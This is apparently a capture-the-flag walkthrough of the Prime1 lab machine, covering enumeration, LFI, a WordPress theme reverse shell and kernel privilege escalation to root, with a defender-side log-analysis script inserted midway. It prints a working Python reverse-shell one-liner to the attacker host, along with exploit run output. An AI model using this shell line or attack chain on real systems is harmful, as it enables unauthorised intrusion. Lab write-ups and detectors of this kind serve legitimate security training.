Prime1 Writeup

In this walkthrough, we exploit this machine through WordPress. However, thorough enumeration is needed first to obtain the WordPress credentials. For privilege escalation (PE), the machine is vulnerable to a kernel exploit. We may run into rabbit holes along the way, including brute-forcing the victor password. Once we gain access to the machine, we notice that the sudo executable is available, but it is not used here to gain a root shell.

Nmap

nmap -sCV -p- -vvv 10.0.2.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 03:02 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Initiating Ping Scan at 03:02
Scanning 10.0.2.104 [2 ports]
Completed Ping Scan at 03:02, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:02
Completed Parallel DNS resolution of 1 host. at 03:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 03:02
Scanning 10.0.2.104 [65535 ports]
Discovered open port 22/tcp on 10.0.2.104
Discovered open port 80/tcp on 10.0.2.104
Completed Connect Scan at 03:02, 31.15s elapsed (65535 total ports)
Initiating Service scan at 03:02
Scanning 2 services on 10.0.2.104
Completed Service scan at 03:02, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 10.0.2.104.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.16s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Nmap scan report for 10.0.2.104
Host is up, received syn-ack (0.054s latency).
Scanned at 2021-07-22 03:02:02 BST for 38s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcSVb7n0rTb58TfCcHJgtutnZzqf0hl48jPxI+VHOyhiQIihkQVkshhc8LdnSUg2BRGZL+RFfNLan9Q6FY0D7T/7PMlggPtSLU80er3JJO+XMfO3NURgMtVtKS0m+nRbL9C/pKSgBewxIcPk7Y45aXjAo7tsSoJ3DZUDcaitfFbAlr+108VBSx/arOXbYtusI1E2OCj1v/VKgVA9N/FL/OHuloOZPs/hY0MoamQKy+XYNdyCtrvSeRmItf09YXhFJwfY9Tr/nk077J7cz3r3INP+AFrpKVjdUAtxNpb+zAJLMJY8WF7oRZ1B8Sdljsslkh8PPK8e6Z4/rlCaJYW0OX
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiCXK7fYpBhJbT1KsyJkcpdXc1+zrB9rHVxBPtvA9hwTF4R4dZCZI9IpMFrperU0wqI/8uGYF9mW8l3aOAhJqc=
|   256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKMh3392Cf8RmKX5UyT6C1yLIVbncwwUg1i2P7/ucKk
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.96 seconds

Enumeration

Web Enumeration

Using dirb, we found secret.txt.

Following the hint in secret.txt, let's start fuzzing for parameter names on the PHP pages:

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 --hc 404 http://10.0.2.104/index.php?FUZZ=something
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.0.2.104/index.php?FUZZ=something
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"  

So we find that file is a valid parameter; now let's fuzz it for any LFI.

Then we can move to image.php, where we'll fuzz for LFI as well.

Yes, now we have a working LFI, and the output also mentions that there is a password file in the /home/saket directory.

Now that we have the password, let's try it on WordPress.

Exploitation

Now it's easy to get into the machine via WordPress.

Let's inject PHP code that returns a reverse shell into a file under the theme directory.

We need to curl the PHP file to trigger the reverse shell:

curl http://10.0.2.104/wordpress/wp-content/themes/twentynineteen/secret.php

Nice, we get a reverse shell:

nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.0.2.93] from (UNKNOWN) [10.0.2.104] 43204
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 22:10:13 up  1:43,  1 user,  load average: 0.05, 0.17, 0.18
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
guest-gy tty7     :0               21:10    2:04m  2.74s  0.22s /sbin/upstart --user
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ export RHOST="10.0.2.93";export RPORT=5555;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
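As an added defender-side example (not part of the original writeup), the Python script below runs over constructed Apache access-log lines and flags the three web-side behaviours used above: parameter-name fuzzing of index.php, traversal values aimed at image.php, and a direct request to a PHP file dropped under a theme directory. The log lines, the parameter name used on image.php, the user agents and the fuzzing threshold are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (not real logs) modelled on this
# writeup: wfuzz guessing parameter names on index.php, an LFI probe against
# image.php (parameter name assumed) and curl hitting a PHP file in a theme dir.
SAMPLE_LOG = """\
10.0.2.93 - - [22/Jul/2021:03:05:01 +0100] "GET /index.php?admin=something HTTP/1.1" 200 206 "-" "Wfuzz/3.1.0"
10.0.2.93 - - [22/Jul/2021:03:05:01 +0100] "GET /index.php?file=something HTTP/1.1" 200 206 "-" "Wfuzz/3.1.0"
10.0.2.93 - - [22/Jul/2021:03:05:02 +0100] "GET /index.php?page=something HTTP/1.1" 200 206 "-" "Wfuzz/3.1.0"
10.0.2.93 - - [22/Jul/2021:03:09:40 +0100] "GET /image.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1894 "-" "Wfuzz/3.1.0"
10.0.2.93 - - [22/Jul/2021:03:12:05 +0100] "GET /wordpress/wp-content/themes/twentynineteen/secret.php HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.0.2.50 - - [22/Jul/2021:03:12:30 +0100] "GET /wordpress/?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Traversal, absolute paths or well-known sensitive files inside a (decoded) query value.
LFI_VALUE_RE = re.compile(r"(\.\./|^/|etc/passwd|proc/self)")
# Theme PHP is normally loaded via index.php; a direct hit usually means a dropped file.
THEME_PHP_RE = re.compile(r"/wp-content/themes/[^/]+/[^/]+\.php$")
FUZZ_THRESHOLD = 3  # distinct parameter names from one IP against one path (assumed)


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))  # parse_qsl also percent-decodes the values
    return {"ip": m.group("ip"), "status": int(m.group("status")), "path": parts.path,
            "params": parse_qsl(parts.query, keep_blank_values=True)}


def analyze(log_text):
    alerts, names_seen = [], defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            names_seen[(rec["ip"], rec["path"])].add(name)
            if LFI_VALUE_RE.search(value):
                alerts.append(("lfi_probe", rec["ip"], f"{rec['path']}?{name}={value} -> {rec['status']}"))
        if THEME_PHP_RE.search(rec["path"]):
            alerts.append(("theme_php_direct", rec["ip"], rec["path"]))
    for (ip, path), names in names_seen.items():
        if len(names) >= FUZZ_THRESHOLD:
            alerts.append(("param_fuzzing", ip, f"{path}: {len(names)} distinct parameter names"))
    return alerts
```

Each alert is a (rule, source IP, detail) tuple; on the sample above all three rules fire for 10.0.2.93 and nothing fires for the benign visitor.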

Privilege Escalation

Kernel exploit

uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

This kernel version is vulnerable to a known kernel exploit.

Here is the link to the kernel exploit:

www-data@ubuntu:/tmp$ gcc explit.c -o exploit
gcc explit.c -o exploit
www-data@ubuntu:/tmp$ ./exploit
./exploit
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff92c47b659200
[*] Leaking sock struct from ffff92c47745f800
[*] Sock->sk_rcvtimeo at offset 592
[*] Cred structure at ffff92c4789396c0
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff92c4789396c0
[*] credentials patched, launching shell...
# whoami
whoami
root